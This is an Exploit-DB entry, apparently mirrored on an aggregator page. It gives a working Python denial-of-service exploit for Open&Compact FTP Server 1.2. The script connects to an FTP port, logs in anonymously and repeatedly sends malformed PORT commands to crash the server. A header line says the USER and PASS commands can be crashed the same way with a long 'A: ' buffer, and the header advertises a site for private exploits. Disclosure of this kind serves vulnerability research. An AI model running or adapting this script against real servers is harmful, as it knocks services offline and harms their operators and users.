(Gabriel’s FTP Server) Open & Compact FTP Server 1.2 – ‘PORT’ Remote Denial of Service

  • 作者: Ma3sTr0-Dz
    日期: 2010-05-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/12698/
  • =============================================================================
    # Tilte: Open&Compact Ftp Server 1.2 "PORT" command Remote Denial of Service.
    =============================================================================
    
    # Date....................: [22-05-2010]
    # Author..................: [Ma3sTr0-Dz]
    # Location ...............: [Algeria]
    # Software ...............: [Open&Comapct Ftp Server 1.2 "PORT" command Remote Denial of Service]
    # Impact..................: [Remote]
    # Site Software ..........: [http://sourceforge.net/projects/open-ftpd/]
    # Sptnx ..................: [CmOs_CLR & Sec4ever Memberz.]
    # Home : .................: [Www.Sec4ever.Com/home/ For Latest 2010 Localz & priv8 Exploits !]
    # Contact me : ...........: [o5m@hotmail.de] 
    # Vulnerability: Remote Denial of service .
    # Part ExplOit & Bug Codes :
    ---
    
    #!/usr/bin/python
    
    import socket
    
    print '---------------------------------------------------------------------'
    print ' Open&Compact Ftp Server 1.2 "PORT" command Remote Denial of Service'
    print ' url: http://sourceforge.net/projects/open-ftpd'
    print ' author: Ma3sTr0-Dz'
    print ' mail: o5m@hotmail.de'
    print ' site: www.sec4ever.com'
    print ' USER and PASS methods are vulnerable too, just pass "A: " * 1000'
    print ' as buffer'
    print '---------------------------------------------------------------------'
    
    buffer = "A" * 5
    
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("127.0.0.1",21))
    s.send('USER %s\r\n' % "anonymous")
    
    for i in range(1,31):
     s.send('PORT %s\n\n' % buffer)
     print "Sending request n. " + str(i)